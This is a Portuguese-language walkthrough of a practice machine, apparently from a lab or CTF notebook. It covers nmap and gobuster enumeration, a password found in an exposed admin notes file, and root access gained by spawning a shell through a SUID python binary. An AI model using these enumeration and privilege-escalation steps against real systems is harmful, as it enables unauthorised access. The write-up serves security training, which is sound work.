AdminNoobMachine

IP: 10.0.0.13

Enumeration

# nmap -sC -sV -v -Pn 10.0.0.13
..............................
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Hacker Secutiry
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34602/udp   status
|   100024  1          36685/udp6  status
|   100024  1          51734/tcp   status
|_  100024  1          54568/tcp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# gobuster dir -e -u http://10.0.0.13 -w /usr/share/dirb/wordlists/big.txt 
===============================================================
http://10.0.0.13/.htaccess            (Status: 403) [Size: 293]
http://10.0.0.13/.htpasswd            (Status: 403) [Size: 293]
http://10.0.0.13/LICENSE              (Status: 200) [Size: 1093]
http://10.0.0.13/admin                (Status: 301) [Size: 306] [--> http://10.0.0.13/admin/]
http://10.0.0.13/css                  (Status: 301) [Size: 304] [--> http://10.0.0.13/css/]  
http://10.0.0.13/img                  (Status: 301) [Size: 304] [--> http://10.0.0.13/img/]  
http://10.0.0.13/js                   (Status: 301) [Size: 303] [--> http://10.0.0.13/js/]   
http://10.0.0.13/mail                 (Status: 301) [Size: 305] [--> http://10.0.0.13/mail/] 
http://10.0.0.13/manual               (Status: 301) [Size: 307] [--> http://10.0.0.13/manual/]
http://10.0.0.13/server-status        (Status: 403) [Size: 297]                               
http://10.0.0.13/vendor               (Status: 301) [Size: 307] [--> http://10.0.0.13/vendor/]

http://10.0.0.13/admin/temp.txt Anotacoes : Eu preciso trocar a minha senha hsecpwd123 , ja faz tempo que utilizo ela.

Exploração

hsec@noob1:~$ id
uid=1000(hsec) gid=1000(hsec) groups=1000(hsec)
hsec@noob1:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 8.10 (jessie)
Release:	8.10
Codename:	jessie
hsec@noob1:~$ uname -a
Linux noob1 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

Temos aqui uma Debian 8.10 om kernel 3.16.0

Pós Exploração

Vamos procurar "executáveis" que eventualmente possuam privilégios de root

hsec@noob1:/$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13  2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 106908 Mar 23  2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount

Repare que o python está habilitado para codar com root, então basta:

hsec@noob1:/$ python -c "import pty; pty.spawn(\"/bin/sh\")" 
# id
uid=1000(hsec) gid=1000(hsec) euid=0(root) groups=1000(hsec)
PreviousEasyMachine01NextAdminNoobMachine2

Last updated